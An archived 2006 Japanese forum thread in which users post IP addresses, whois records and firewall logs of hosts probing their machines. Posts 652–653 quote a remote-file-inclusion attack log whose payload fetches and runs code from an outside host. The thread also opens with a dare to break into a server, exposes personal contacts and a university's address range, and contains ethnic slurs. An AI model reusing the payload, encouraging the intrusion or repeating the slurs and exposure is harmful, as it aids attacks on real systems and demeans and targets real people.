http://oresama.hopto.org/〜sheel/directory/

おまいらのスキルとやらでこのサーバを突破してください。
俺様のスキルと、おまいらのスキルと、どっちが上かこれではっきりさせてあげよう。

ちなみに言っておくけど、逆襲食らわないように
IPアドレスくらい隠してねw
それと突破方法もばれないようにしてねw
User-Agentくらいもばれないように小細工してねw
80番ポートくらいは閉じてからアクセスしようねw
609名無しさん@お腹いっぱい。:2006/02/22(水) 16:38:36
inetnum:202.127.144.0-202.127.159.255
netname:WHCAS-CN
descr:chines Academy of Science, Wuhan Branch
descr:Wuhan Institute of Pysics
descr:Wuhan,Hubei 430071
country:chankoro
admin-c:LH90-AP
tech-c:LH90-AP
mnt-by:MAINT-CNNIC-AP
changed:[email protected] 20010329
statas:ALLOCATED PORTABLE
source:APNIC

person:Li Hong
nic.hadl:LH90-AP
e-mail:[email protected]
address:No4,Zhongguancun 4th South Street,Haidian District, Beijing
phone:+86-10-58812000
fax-no:+86-10-58812900
country:chankoro
changed:[email protected] 20041109
mnt-by:MAINT-CN-LIHONG
source:APNIC
610名無しさん@お腹いっぱい。:2006/02/22(水) 21:58:52

IPアドレス 202.83.135.35
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ 日本 (JP)
611名無しさん@お腹いっぱい。:2006/02/23(木) 22:17:32
219.182.184.128
612名無しさん@お腹いっぱい。:2006/02/24(金) 14:33:20
さっきからIPを変えつつ叩いてくる輩がいる・・・うぜー
613名無しさん@お腹いっぱい。:2006/02/24(金) 19:56:45
IP変えてって・・・
614名無しさん@お腹いっぱい。:2006/02/25(土) 02:57:41
222.149.193.128
615名無しさん@お腹いっぱい。:2006/02/25(土) 09:25:30
ほんと中国多いな
616名無しさん@お腹いっぱい。:2006/02/25(土) 10:34:00
125.52.33.184
125.52.33.184
125.52.33.184
617名無しさん@お腹いっぱい。:2006/02/25(土) 21:14:44
203.211.254.55
618名無しさん@お腹いっぱい。:2006/02/25(土) 21:44:59
IP Address 220.171.28.74
Network CHINANET-XJ
Location China
Province network CHINANET xinjiang
+86-10-58501724

LI ZHAO
+86-991-5820832
619名無しさん@お腹いっぱい。:2006/02/26(日) 01:13:00
59.34.196.37
61.145.112.142
620名無しさん@お腹いっぱい。:2006/02/26(日) 10:53:51
すげー回線の調子悪いと思って、
ルーターのログ見たら・・・
同じプロバイダーのIPの近い奴に、
凄まじい勢いでポート80叩かれてたorz
もちろんルーターが弾いてくれてたから、
侵入とかはなかったけど・・・
なんなんだよあいつは・・・
621名無しさん@お腹いっぱい。:2006/02/26(日) 11:43:34
恐ろしいな
622名無しさん@お腹いっぱい。:2006/02/26(日) 15:26:10
>>620
php狙い
623名無しさん@お腹いっぱい。:2006/02/26(日) 19:10:30
IPアドレス 206.223.150.96
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

アメリカウザイ
624623:2006/02/26(日) 19:16:02
ちなみにヒット数は10
625名無しさん@お腹いっぱい。:2006/02/26(日) 20:15:36
またアメリカから
ヒット数5

IPアドレス 65.54.194.118
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
626名無しさん@お腹いっぱい。:2006/02/27(月) 00:27:59
59.85.21.159
59.85.24.225
59.85.15.197
59.85.14.36
627名無しさん@お腹いっぱい。:2006/02/27(月) 17:23:24
219.180.242.40
220.209.205.16
628名無しさん@お腹いっぱい。:2006/02/27(月) 18:49:38
今日はさらにひどい・・・

61.213.191.200 日本
207.68.178.61 アメリカ
219.166.142.212 日本(福井)
61.236.229.19 中国
60.190.23.156 中国

しかしホント中国多いな
629名無しさん@お腹いっぱい。:2006/02/27(月) 19:22:26
こんな場末に晒してなんか意味あんのかね?
警察に通報した方がまだ有意義と思うが。
630名無しさん@お腹いっぱい。:2006/02/27(月) 20:39:02
2006年2月27日 18:15:58 Unrecognized access from 43.244.85.117:4467 to TCP port 445
2006年2月27日 18:16:01 Unrecognized access from 43.244.85.117:4467 to TCP port 445
2006年2月27日 18:20:17 Unrecognized access from 43.244.105.92:1637 to TCP port 445
2006年2月27日 18:20:20 Unrecognized access from 43.244.105.92:1637 to TCP port 445
2006年2月27日 18:20:30 Unrecognized access from 43.244.240.16:1982 to TCP port 445
2006年2月27日 18:20:33 Unrecognized access from 43.244.240.16:1982 to TCP port 445
2006年2月27日 18:20:58 Unrecognized access from 43.244.240.16:3607 to TCP port 139
なんで、こんなに来るのか?
631名無しさん@お腹いっぱい。:2006/02/27(月) 21:10:00

aol.co.jpに問い合わせしたら?
632名無しさん@お腹いっぱい。:2006/02/27(月) 22:58:48
132.248.202.37 メキシコ
633名無しさん@お腹いっぱい。:2006/02/27(月) 23:12:06
おまえら、本屋に売ってる
「ハニーポットなんちゃら」
って本はもう読んだか?
634名無しさん@お腹いっぱい。:2006/02/28(火) 18:04:24
207.46.216.42 アメリカ ←毎日しつこい。
221.112.20.67 日本
65.54.194.118 アメリカ
635名無しさん@お腹いっぱい。:2006/02/28(火) 19:02:02
12.120.13.25 アメリカ
65.54.194.118 アメリカ
636名無しさん@お腹いっぱい。:2006/02/28(火) 21:35:24
さっきからIP変えつつ叩いてくる奴がいる。
219.103.130.30 日本 2006/02/28 21:23:03 - 2006/02/28 21:31:35 ヒット数56
219.103.130.29 日本 2006/02/28 21:23:03 - 2006/02/28 21:31:35 ヒット数94
65.216.116.114 アメリカ

今日やたら多い、ウゼー
637名無しさん@お腹いっぱい。:2006/02/28(火) 23:05:48
ヒット数94て・・・
638636:2006/03/01(水) 13:16:27
IPAに通報しますた
639名無しさん@お腹いっぱい。:2006/03/01(水) 14:42:09
具体的にどうやって通報したらいいの?< IPA
640636:2006/03/01(水) 15:04:50
641名無しさん@お腹いっぱい。:2006/03/01(水) 16:24:28
Tnx!
642名無しさん@お腹いっぱい。:2006/03/01(水) 17:00:43
なんかもうアクセス制限かけるのが面倒になってしばらく放置してる
643名無しさん@お腹いっぱい。:2006/03/02(木) 04:33:30
220.219.114.22

IPアドレス 220.219.114.22
ホスト名 ntszok045022.szok.nt.ftth.ppp.infoweb.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 光


644名無しさん@お腹いっぱい。:2006/03/02(木) 04:35:21
60.46.92.2

IPアドレス 60.46.92.2
ホスト名 p5002-ipad302sasajima.aichi.ocn.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 愛知県
市外局番 --
接続回線 xDSL
645名無しさん@お腹いっぱい。:2006/03/02(木) 05:16:48
IPアドレス 125.193.92.164
ホスト名 FLH1Adr164.hyg.mesh.ad.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 光
646名無しさん@お腹いっぱい。:2006/03/02(木) 05:20:00
IPアドレス 58.87.190.191
ホスト名 p57bebf.hkidnt01.ap.so-net.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 北海道
市外局番 --
接続回線 光
647名無しさん@お腹いっぱい。:2006/03/02(木) 15:44:54
61.129.49.125 国不明
12.120.37.21 国不明
65.216.116.114 国不明
648名無しさん@お腹いっぱい。:2006/03/02(木) 22:24:57
inetnum: 221.5.128.0-221.5.255.255
netname: CNC GROUP-CQ
descr: CNC Group Chongqing province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
649名無しさん@お腹いっぱい。:2006/03/02(木) 23:15:28
>>647
>>1のNeoTrace Express使うよろし。
whoisからtracert、国とその国のどこの都市や地域から、
発信されたかまでわかる。
650名無しさん@お腹いっぱい。:2006/03/03(金) 08:30:35
>>649
すぐ落ちてしまい、起動すら出来ない。
651名無しさん@お腹いっぱい。:2006/03/03(金) 14:25:45
58.12.163.188から数千回にわたるSSHアタックが。
USENを利用している奴らしい。
mynetwatchmanでもすでに探知されてる。
652名無しさん@お腹いっぱい。:2006/03/03(金) 16:31:18
リモートコードインジェクション攻撃来た・・。
しかもものの見事に200返してるし・・・

wldthng.nexcess.net "GET /thisdoesnotexistahaha.php HTTP/1.1" 404
wldthng.nexcess.net "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 200 50 "-" ★
wldthng.nexcess.net "GET /cal/tools/send_reminders.php HTTP/1.1" 404
wldthng.nexcess.net "GET /Calendar/tools/send_reminders.php HTTP/1.1" 404

wldthng.nexcess.net "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 200 ★
:
wldthng.nexcess.net "GET http://xxx.xxx.xxx.xxx//webcalendar/tools/send_reminders.php?
includedir=http://81.58.26.26/libsh/shit.txt?&cmd= HTTP/1.1" 200 1341 "-" "-"

最後の行でセキュリティーホール突かれてる・・。
http://81.58.26.26/libsh/shit.txt見ると、色々wgetしたり色々している。

-----------------------------------------------------
$SCWD = `wget http://81.58.26.26/libsh/ping.txt;mv ping.txt temp2006
;perl temp2006 213.25.56.61 3303・・・・
-----------------------------------------------------
653名無しさん@お腹いっぱい。:2006/03/03(金) 16:31:59
httpdのerrorlog見るともろ実行しているし・・。

--08:24:09-- http://81.58.26.26/libsh/ping.txt
=> `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory.
Use -S to search $PATH for it.


sh: ./ping: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

6 15808 6 1123 0 0 1660 0 0:00:09 --:--:-- 0:00:09 1660
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory

⇒ちなみにpingってファイルはLinux/RSTっちゅうLinuxのウイルスだったり
 /tmp配下にPerlのBOTが吐かれてたり。恐ろしいです。要注意・・・。
654名無しさん@お腹いっぱい。:2006/03/03(金) 19:02:53
>>649
アドバイスどうもです
655647:2006/03/03(金) 19:09:16
>>649
>>647のIPを ttp://www2.arearesearch.co.jp/ip-kensaku.html で検索したら国が出てきました。
昨日は出なかったんだがな・・・
656名無しさん@お腹いっぱい。:2006/03/03(金) 23:35:31
IPアドレス 61.89.135.214
ホスト名 pon003-214.kcn.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

Domain Information: [ドメイン情報]
a. [ドメイン名] KCN.NE.JP
b. [ねっとわーくさーびすめい]
c. [ネットワークサービス名] KCN-Netサービス
d. [Network Service Name] KCN-Net Service
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] YK261JP
n. [技術連絡担当者] TK382JP
p. [ネームサーバ] dns0.kcn.ne.jp
p. [ネームサーバ] dns1.kcn.ne.jp
[状態] Connected (2006/10/31)
[登録年月日] 1998/10/21
[接続年月日] 1998/11/13
[最終更新] 2005/11/01 01:18:26 (JST)
657名無しさん@お腹いっぱい。:2006/03/04(土) 00:17:48
IPアドレス 221.230.31.42
ホスト名 対応するホスト名がありません
IPアドレス
割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
658名無しさん@お腹いっぱい。:2006/03/04(土) 00:19:13
IPアドレス 219.107.190.124
ホスト名 FLA1Aaz124.stm.mesh.ad.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 xDSL


Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.107.0.0/16
b. [ネットワーク名] BIGLOBE-6
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2002/06/14
[返却年月日]
[最終更新] 2004/04/12 17:47:01(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 219.107.0.0/16
659名無しさん@お腹いっぱい。:2006/03/04(土) 01:00:31
IPアドレス 220.208.44.210
ホスト名 --
IPアドレス
割当国 ※ --
都道府県 --
市外局番 --
接続回線 --

Whois 検索結果
IPアドレス
所有者情報 --
ドメイン
所有者情報 --

660名無しさん@お腹いっぱい。:2006/03/04(土) 01:02:30
IPアドレス 201.43.17.63
ホスト名 201-43-17-63.dsl.telesp.net.br
IPアドレス
割当国 ※ ブラジル (BR)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

661名無しさん@お腹いっぱい。:2006/03/04(土) 13:29:53
ウイルスバスターのLANパトでやたらとしらんIPがあるんだが・・・
662名無しさん@お腹いっぱい。:2006/03/04(土) 16:43:18
IP近いのなら同じプロパイダの奴でしょ。
663名無しさん@お腹いっぱい。:2006/03/04(土) 17:23:43
ほったらかしでおKなのか?
664名無しさん@お腹いっぱい。:2006/03/04(土) 21:03:57
218.135.64.118
またあほーだぜ
665名無しさん@お腹いっぱい。:2006/03/05(日) 02:41:54
210.135.99.5
666名無しさん@お腹いっぱい。:2006/03/05(日) 03:01:58
PC−Clienをかけたら不正アクセスが激減したんですが・・・
(関係ないのかな?)
それまではプリ音食べすぎのアメリカ人が狂ったように(実際問題狂ってるが)
ウチに来てました
667名無しさん@お腹いっぱい。:2006/03/05(日) 05:07:45
TransScoutでしつこい奴
IPアドレス 218.171.128.96
ホスト名 218-171-128-96.dynamic.hinet.net
IPアドレス
 割当国 ※ 台湾 (TW)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
668名無しさん@お腹いっぱい。:2006/03/05(日) 05:09:43
Rat トロイの木馬のデフォルト遮断
IPアドレス 125.213.101.187
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
669名無しさん@お腹いっぱい。:2006/03/05(日) 05:10:37
Phinneas Phucker トロイの木馬のデフォルト遮断
IPアドレス 220.7.60.15
ホスト名 softbank220007060015.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 群馬県
市外局番 --
接続回線 xDSL
670名無しさん@お腹いっぱい。:2006/03/05(日) 05:12:42
FTP99CMP トロイの木馬のデフォルト遮断
IPアドレス 219.110.151.5
ホスト名 h219-110-151-005.catv02.itscom.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 神奈川県
市外局番 --
接続回線 CATV
671名無しさん@お腹いっぱい。:2006/03/05(日) 05:13:29
Bla トロイの木馬のデフォルト遮断
IPアドレス 222.45.80.12
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
672名無しさん@お腹いっぱい。:2006/03/05(日) 05:14:30
すみません。どうして自分のパソコンを狙ってるのでしょう?
それとも手当たり次第にやってるだけなの?
673名無しさん@お腹いっぱい。:2006/03/05(日) 09:36:31
>>672
IPアドレスがどういうものか考えればわかるよ。
674sage:2006/03/05(日) 09:56:14
210.136.161.74
proxy360.docomo.ne.jp
DoCoMo/2.0SH901iC(c100;TB;W30H15)
DoCoMo/2.0SH901iC(c100;TB;W30H15)
675名無しさん@お腹いっぱい。:2006/03/05(日) 10:25:01
IPアドレス 221.39.214.10
ホスト名 softbank221039214010.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 青森県
市外局番 --
接続回線 xDSL

こいつウザイ
676名無しさん@お腹いっぱい。:2006/03/05(日) 18:06:28
207.46.216.30-47

末尾変えつつ百回以上
アフォですか?
677名無しさん@お腹いっぱい。:2006/03/05(日) 23:56:18
>>676
てめぇが何かに感染していてアクセスがウゼェから反対にやられているんじゃねえのかよ?
678名無しさん@お腹いっぱい。:2006/03/06(月) 01:21:56
Mar 6 00:21:48 ntrap sshd[3187]: refused connect from mrt02.me.noda.sut.ac.jp

アホ大学晒しあげ
679名無しさん@お腹いっぱい。:2006/03/06(月) 01:33:56
詳細: 侵入を検出して遮断しました。 tmp6.2ch.net(206.223.149.90) とのすべての
通信は 30 分間にわたって遮断されます。


何故にダウソ板から・・・?
680名無しさん@お腹いっぱい。:2006/03/06(月) 01:44:30
>>676
一週間ぶりにPC立ち上げたらルーターに足跡があったんだが
なんで一方的に決めつけてそんなに激ってるのかわからん

カルシウム不足ですか?
681名無しさん@お腹いっぱい。:2006/03/06(月) 01:45:07
>>677だった
682名無しさん@お腹いっぱい。:2006/03/06(月) 02:16:48

IPアドレス 210.239.42.143
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
683名無しさん@お腹いっぱい。:2006/03/06(月) 09:01:38
221.10.158.106
糞シナ
684名無しさん@お腹いっぱい。:2006/03/06(月) 18:05:07
IPアドレス 206.204.51.131
ホスト名 security.symantec.com
IPアドレス
割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

Whois 検索結果
IPアドレス
所有者情報 206.204.51.131 を whois.arin.net で検索しました
685名無しさん@お腹いっぱい。:2006/03/06(月) 18:06:39
IPアドレス 206.204.51.131
ホスト名 security.symantec.com
IPアドレス
割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
686名無しさん@お腹いっぱい。:2006/03/06(月) 18:37:52
IPアドレス 221.235.144.175
ホスト名 対応するホスト名がありません
IPアドレス
割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
687名無しさん@お腹いっぱい。:2006/03/06(月) 19:15:25
>>684-685
security.symantec.com

貴様の目はふしあなか?
688さくら:2006/03/07(火) 01:01:23
メル友募集中だぉ
[email protected]
689名無しさん@お腹いっぱい。:2006/03/07(火) 02:24:24
61.156.240.66(CN) UDP=2,1026,1027,1028,1029,1031,1032,1033,4073
221.203.145.73(CN) UDP=2,1026,1027,1028,1029,1030,1031,1032,1033,4073,4081
こいつらしつこい。

211.190.179.180(KR) TCP=6129,1025
211.154.43.85(CN) TCP=6129
Backdoorを探索中?
690名無しさん@お腹いっぱい。:2006/03/07(火) 03:12:07
IPアドレス 59.117.122.6
ホスト名 59-117-122-6.dynamic.hinet.net
IPアドレス
 割当国 ※ 台湾 (TW)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
691名無しさん@お腹いっぱい。:2006/03/07(火) 20:18:44
IPアドレス 221.87.148.145
ホスト名 softbank221087148145.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 鹿児島県
市外局番 --
接続回線 xDSL

薩摩武士ですよ〜
692名無しさん@お腹いっぱい。:2006/03/08(水) 00:31:02
1. 2006/03/07|22:55:23| Port scan attempt 58.18.64.162 1
2. 2006/03/07|22:45:03| Port scan attempt 218.61.35.52 1
3. 2006/03/07|22:34:57| Port scan attempt 221.195.72.74 1
4. 2006/03/07|22:29:41| Port scan attempt 58.18.64.162 1
5. 2006/03/07|21:43:55| Port scan attempt 218.61.35.52 2
6. 2006/03/07|21:23:08| Port scan attempt 221.211.255.11 1
7. 2006/03/07|19:55:17| Port scan attempt 58.18.64.162 2
8. 2006/03/07|19:40:10| Port scan attempt 60.11.125.38 2
9. 2006/03/07|19:03:53| Port scan attempt 58.18.64.162 3
10. 2006/03/07|18:50:38| Port scan attempt 221.5.251.183 9
11. 2006/03/07|17:21:00| Port scan attempt 58.18.64.162 1
12. 2006/03/07|16:50:05| Port scan attempt 218.61.35.52 1
13. 2006/03/07|13:55:16| Port scan attempt 58.18.64.162 3
14. 2006/03/07|13:03:03| Port scan attempt 221.203.145.29 1
15. 2006/03/07|12:57:39| Port scan attempt 218.61.35.52 1
16. 2006/03/07|11:20:52| Port scan attempt 58.18.64.162 1
17. 2006/03/07|11:15:10| Port scan attempt 60.11.125.38 1
18. 2006/03/07|10:40:45| Port scan attempt 221.5.251.183 2
19. 2006/03/07|09:17:54| Port scan attempt 220.168.158.13 2
20. 2006/03/07|09:12:23| Port scan attempt 58.18.64.162 1
21. 2006/03/07|09:05:29| Port scan attempt 218.61.35.52 2
22. 2006/03/07|07:55:12| Port scan attempt 58.18.64.162 2
23. 2006/03/07|07:32:22| Port scan attempt 221.211.255.11 1
24. 2006/03/07|06:12:16| Port scan attempt 58.18.64.162 4
25. 2006/03/07|05:14:52| Port scan attempt 221.211.255.11 1
26. 2006/03/07|04:29:24| Port scan attempt 58.18.64.162 2
27. 2006/03/07|02:54:53| Port scan attempt 221.211.255.11 1
28. 2006/03/07|02:53:22| Port scan attempt 60.11.125.38 2
29. 2006/03/07|02:46:28| Port scan attempt 218.61.35.52 2
30. 2006/03/06|23:21:18| Port scan attempt 58.18.64.162 5
693名無しさん@お腹いっぱい。:2006/03/08(水) 22:41:08
ポートスキャン 202.214.159.206 192.168.11.10 2006/03/07 21:35:13 - 2006/03/07 21:43:58 15

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.214.159.0/24
b. [ネットワーク名] ACCELIA-NET
f. [組織名] アクセリア 株式会社
g. [Organization] Accelia, Inc.
m. [管理者連絡窓口] TC116JP
n. [技術連絡担当者] AK1474JP
p. [ネームサーバ] ns-ac-01.accelia.net
p. [ネームサーバ] ns1.iij.ad.jp
[割当年月日] 2001/01/25
[最終更新] 2004/01/29 10:45:08(JST)

上位情報
----------
株式会社インターネットイニシアティブ (Internet Initiative Japan Inc.)
[割り振り] 202.214.0.0/16

下位情報
----------
該当するデータがありません。
694名無しさん@お腹いっぱい。:2006/03/08(水) 22:52:58
IPアドレス 59.84.99.163
ホスト名 p163.net059084099.tokai.or.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 種別不明
695名無しさん@お腹いっぱい。:2006/03/09(木) 02:46:19
ウィンドウズファイル共有って何かあんの?
他の135だのの時もあるけどファイル共有が多いんだ
696名無しさん@お腹いっぱい。:2006/03/09(木) 08:31:05
>>695
Remote Procedure Call (RPC)
一番セキュリティホールが多いのが135番だから、
WindowsUpdateをしていないやつらが狙われるし、感染に気づいていない感染者も一番多い。
アクセス元じゃなくてアクセス先ポートが135番になっている場合は、
不正アクセスして来たこいつらのパソコンは、まずネットワークワームに感染している。
このポートだけは擬似的にファイアーウォールでしか閉じられない。
697名無しさん@お腹いっぱい。:2006/03/09(木) 09:11:33
>696
どうもありがとう。
ポートは139だった…
698名無しさん@お腹いっぱい。:2006/03/10(金) 19:19:18
IPアドレス 219.206.140.55
ホスト名 softbank219206140055.bbtec.net
IPアドレス
割当国 ※ 日本 (JP)
都道府県 神奈川県
市外局番 --
接続回線 xDSL

5分置きに突撃してくる。うざい(;・∀・)
699名無しさん@お腹いっぱい。:2006/03/12(日) 06:37:10
IPアドレス 221.244.122.36
ホスト名 221x244x122x36.ap221.ftth.ucom.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光
700名無しさん@お腹いっぱい。:2006/03/12(日) 15:53:42
58.0.132.48

うぜー
しかもこいつ暢気に鯖なんか立ててる
701名無しさん@お腹いっぱい。:2006/03/12(日) 15:56:31
libwww-perl/5.803
とか
lwp-trivial/1.41
を使って、とうの昔に既になくなったディレクトリやファイルを
2,3日ごとにチェックしにくるのって怪しいよな?
晒すべきか?
702名無しさん@お腹いっぱい。:2006/03/12(日) 16:40:38
うげー!
IP調べてみた上でググってみたら、某IT関連大学(?)の教授だったぞ!
結構有名な奴みたいじゃねえかよ。
しかも2ちゃんに彼に関するスレまでありやがる…
俺はどうすべきなのだろう。はっきり言って超キモい。

大学に電話かメールすべきだろうか
703名無しさん@お腹いっぱい。:2006/03/12(日) 16:45:34
(^ω^;)がんばれ…
704名無しさん@お腹いっぱい。:2006/03/12(日) 17:47:59
>>703
ここで晒すつもりだったが、誰のIPかハッキリわかってしまうので
非常にまずい気がする
本人がやっているのだとしたら、もう滅茶苦茶バカな奴としか胃炎
それもとこいつのパソが悪用されているのか…
むう・・どうすんべ・・・
705名無しさん@お腹いっぱい。:2006/03/12(日) 18:04:53
IPアドレス 219.48.146.99
ホスト名 softbank219048146099.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 xDSL


IPアドレス 210.236.186.123
ホスト名 dhcp186-122.ztv.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 和歌山県
市外局番 --
接続回線 CATV

706名無しさん@お腹いっぱい。:2006/03/12(日) 18:06:12
63.251.51.229
707名無しさん@お腹いっぱい。:2006/03/12(日) 18:15:22
>>704
わははははh!
晒せ晒せw
708名無しさん@お腹いっぱい。:2006/03/12(日) 18:30:32
>>704
とりあえずそのスレにご報告しておけ。
709名無しさん@お腹いっぱい。:2006/03/12(日) 20:10:23
>>708
けどその2chのスレけっこう古くて今だれも書き込んでねえんだよ
やっぱここに晒しとくか。

163.221.xx.xx
奈良先端科学技術大学院大学

まずはとりあえずこれだけにしとく。IP検索で出てくる当人の仕業では
ないのかもしれんし…
にしても、とんちんかんな場所にコソコソとアクセスを試みてくるんで、
まじでウザい。

ほぼ lwp-trivial/1.41。ごくたまに libwww-perl/5.803。

嘘書くなとかいっていちゃもんつけられる可能性もあるかもしれねえから、
しばらくアクセスログ保管しとこう。
で、あと1週間様子見てまだ続くようなら大学に正式に苦情してみるか。
710名無しさん@お腹いっぱい。:2006/03/12(日) 20:18:48
>>711
奈良先端か。
じゃ別にIT系ってわけでもないな、まあNECが噛んでるからあれだけど
あそこは学生も年齢の幅も国籍もいろいろいるからなー
しかも、学生寮も家族寮も教授用の宿舎もLAN完備だし、当人の仕業でない可能性も高いな
研究室以外、出入りチェックも無いに等しいからね
711名無しさん@お腹いっぱい。:2006/03/12(日) 21:29:51
信頼済みではないコンピュータ機器に接続されています。

IPアドレス192、168、1,1 コンピュータ名?
MACアドレス00:0b:a2:21:c7:26
712名無しさん@お腹いっぱい。:2006/03/12(日) 21:40:58

IPアドレス220.213.99.117
713名無しさん@お腹いっぱい。:2006/03/13(月) 00:55:59
Rat トロイの木馬
IPアドレス 217.122.128.221
ホスト名 cc503731-a.hgv1.dr.home.nl
IPアドレス
 割当国 ※ オランダ (NL)

Ripper トロイの木馬
IPアドレス 61.64.169.200
ホスト名 61-64-169-200-adsl-tai.dynamic.so-net.net.tw
IPアドレス
 割当国 ※ 台湾 (TW)

Ripper トロイの木馬
IPアドレス 59.117.122.6
ホスト名 59-117-122-6.dynamic.hinet.net
IPアドレス
 割当国 ※ 台湾 (TW
714名無しさん@お腹いっぱい。:2006/03/13(月) 02:48:34
IPアドレス 218.130.40.10
ホスト名 softbank218130040010.bbtec.net
IPアドレス割当国 ※ 日本 (JP)
都道府県 大阪府
市外局番 --
接続回線 xDSL
715名無しさん@お腹いっぱい。:2006/03/13(月) 04:45:34
210.136.232.249
ad.jp.ap.valuecommerce.com

こんな時間に勝手に何やってるんだ??
716名無しさん@お腹いっぱい。:2006/03/13(月) 10:31:09
>>715
それバリューコマースのクリック型広告鯖じゃねえの?
717名無しさん@お腹いっぱい。:2006/03/13(月) 13:03:29
>>718
そうだけど、なんでうちの鯖に約二時間の間、執拗にアクセスしてるんかが不明
こっちは何もしてないんだけど、どういうこと?
718名無しさん@お腹いっぱい。:2006/03/13(月) 13:48:07
IPアドレス 58.3.88.93
ホスト名 ppp5935.hakata03.bbiq.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

かなり調べたけど都道府県がでねえー(ノд`)
晒したいのに・・ 。゜(゚´Д`゚)゜。
719名無しさん@お腹いっぱい。:2006/03/13(月) 14:17:56
>>718
多分、福岡県福岡市博多区。

bbiq
http://www.bbiq.jp/
は吸収のプロバ。
720名無しさん@お腹いっぱい。:2006/03/13(月) 14:32:06
IPアドレス 219.116.204.171
ホスト名 eatkyo369171.adsl.ppp.infoweb.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 xDSL
721名無しさん@お腹いっぱい。:2006/03/13(月) 20:33:40
IPアドレス 220.208.245.252
ホスト名 nissin48252.ccnw.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 愛知県
市外局番 --
接続回線 CATV
722名無しさん@お腹いっぱい。:2006/03/13(月) 21:11:59
>>718,719-720
何をどう攻撃されたのか詳しく
723名無しさん@お腹いっぱい。:2006/03/13(月) 22:06:17
IPアドレス 220.213.59.241
ホスト名 z241.220-213-59.ppp.wakwak.ne.jp
724名無しさん@お腹いっぱい。:2006/03/13(月) 23:12:43
IP: 218.110.6.185
Node: 設計課共用
Group: WORKGROUP
NetBIOS: WORKGROUP
MAC: 削除
DNS: p6e06b9.tokynt01.ap.so-net.ne.jp

so-netサンいいんすか?
725名無しさん@お腹いっぱい。:2006/03/13(月) 23:14:58
219.182.184.20
しつこくて困ってます。
何とかならないですか?
726名無しさん@お腹いっぱい。:2006/03/13(月) 23:18:15
>>あほーじゃ文句言っても無駄そうだから遮断してあきらめれ
727処刑ライダー ◆.EDMOUBKE2 :2006/03/14(火) 00:02:54
2006/03/13 22:58:32,スーパーバイザ,
侵入: HTTP MSIE JavaScript OnLoad Rte CodeExec,"
侵入: HTTP MSIE JavaScript OnLoad Rte CodeExec
侵入者: pc7.2ch.net(206.223.147.60)(http(80))
危険度: 高レベル プロトコル: TCP
攻撃された IP: localhost
攻撃された ポート: 4930"

これって何だろ。
728処刑ライダー ◆.EDMOUBKE2 :2006/03/14(火) 00:06:56
ブラクラ・チェッカーで板を検査すると、
臭いのが出るんだよなw
729名無しさん@お腹いっぱい。:2006/03/14(火) 00:22:56
IP: 218.70.253.186
Node: BILLGATES
Group: WORKGROUP
NetBIOS: __MSBROWSE__
MAC: 削除
DNS: BILLGATES

ビルゲイツ?
